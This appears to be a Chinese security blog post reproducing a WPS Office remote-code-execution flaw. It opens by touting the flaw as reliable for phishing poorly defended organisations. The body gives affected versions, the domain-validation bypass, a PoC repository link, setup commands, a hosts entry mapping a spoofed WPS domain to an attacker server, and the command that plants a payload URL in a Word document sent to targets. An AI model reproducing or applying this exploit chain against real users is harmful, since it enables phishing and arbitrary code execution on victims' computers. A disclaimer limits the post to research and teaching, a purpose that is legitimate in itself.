这个day是今年国护的时候爆出来的,虽然国护已经过去很久但是这个day的杀伤力依旧很大,许多单位安全意识很薄,借助这个0day钓鱼可谓是屡试不爽。
漏洞影响
WPS Office 2023个人版<11.1.0.15120;WPS Office 2019企业版<11.8.2.1208
漏洞原理
WPS 有内置浏览器,当打开该文档时, WPS 就会通过内置浏览器加载该链接。而有漏洞的版本对域名clientweb.docer.wps.cn.{xxxxx}wps.cn不进行检测,因而可以借助这个逻辑漏洞完成绕过。
复现准备:
本地复现
下载poc,需要python3.8以上的版本
https://github.com/ba0gu0/wps-rce
执行以下命令安装依赖文件
cd wps_rce
pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
在server文件夹下运行
python3 main.py
访问url
在受害主机上添加host
vpsip clientweb.docer.wps.cn.hackerwps.cn
因此弹出计算器的payload为
http://clientweb.docer.wps.cn.hackerwps.cn/calc
进入client文件夹运行
python main.py test.docx http://clientweb.docer.wps.cn.hackerwps.cn/calc
test是要注入payload的文档
生成带有命令的payload到目标主机上运行
原文始发于微信公众号(安全攻防屋):(已复现)WPS钓鱼0day分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论